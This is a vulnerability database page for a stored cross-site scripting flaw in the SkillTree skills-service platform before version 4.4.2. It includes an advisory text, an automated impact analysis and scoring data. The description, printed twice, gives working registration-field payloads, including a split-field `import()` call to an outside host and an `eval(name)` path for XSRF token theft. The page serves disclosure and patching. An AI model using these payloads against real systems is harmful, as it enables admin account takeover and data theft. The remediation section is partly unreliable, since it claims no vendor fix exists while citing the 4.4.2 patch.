Description
SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.
Published: 2026-09-09
Score: 9.6 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution via Stored XSS
Action: Immediate Patch
AI Analysis

Impact

The vulnerability arises from improper input handling: user‑supplied firstName, lastName, and nickname fields are stored without sanitization (CWE‑20, CWE‑116) and later rendered with Vue’s v‑html directive as part of StringHighlighter.js (CWE‑79). This combination also leverages character‑encoding mishandling (CWE‑183), making the platform vulnerable to Stored XSS. An attacker who registers a user with a small HTML payload, such as an <img> tag that triggers JavaScript, can cause arbitrary code execution in an administrator’s browser when the admin visits the Quiz Runs page. This enables the attacker to take full control of the application, including creating backdoor accounts, deleting projects, or exfiltrating data.

Affected Systems

National Security Agency’s skills-service, known as SkillTree, is vulnerable in all releases prior to version 4.4.2. Version 4.4.2 contains the vendor supplied patch that removes the three exploitable attack paths. The product is a micro‑learning gamification platform.

Risk and Exploitability

The CVSS score of 9.6 indicates critical severity. No EPSS score is published, but the attack requires only a legitimate registration with a payload up to 30 characters and no additional social engineering, making exploitation highly feasible. While not yet listed in CISA KEV, the ability to execute arbitrary code in an administrator’s browser signals a high likelihood of real‑world exploitation once visibility of the CVE is established.

Generated by OpenCVE AI on September 9, 2026 at 21:48 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to skills-service version 4.4.2 or later to apply the vendor fix.
  • If upgrade is delayed, sanitize the user‑supplied firstName, lastName, and nickname fields on the server before storage, removing or encoding any HTML markup.
  • Enforce a strict Content Security Policy that blocks inline scripts, disallows eval, and restricts script sources to trusted origins to mitigate any remaining XSS risk.

Generated by OpenCVE AI on September 9, 2026 at 21:48 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 10 Sep 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Nationalsecurityagency
Nationalsecurityagency skills-service
Vendors & Products Nationalsecurityagency
Nationalsecurityagency skills-service

Wed, 09 Sep 2026 19:00:00 +0000

Type Values Removed Values Added
Description SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.
Title NationalSecurityAgency/skills-service has Stored XSS via User Registration Enabling Admin Account Takeover
Weaknesses CWE-116
CWE-183
CWE-20
CWE-693
CWE-79
References
Metrics cvssV3_1

{'score': 9.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L'}


Subscriptions

Nationalsecurityagency Skills-service
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-09-10T16:02:12.939Z

Reserved: 2026-06-15T22:58:06.562Z

Link: CVE-2026-54694

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Deferred

Published: 2026-09-09T19:17:28.400

Modified: 2026-09-10T16:17:14.873

Link: CVE-2026-54694

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-09-10T20:09:55Z

Weaknesses
  • CWE-116

    Improper Encoding or Escaping of Output

  • CWE-183

    Permissive List of Allowed Inputs

  • CWE-20

    Improper Input Validation

  • CWE-693

    Protection Mechanism Failure

  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')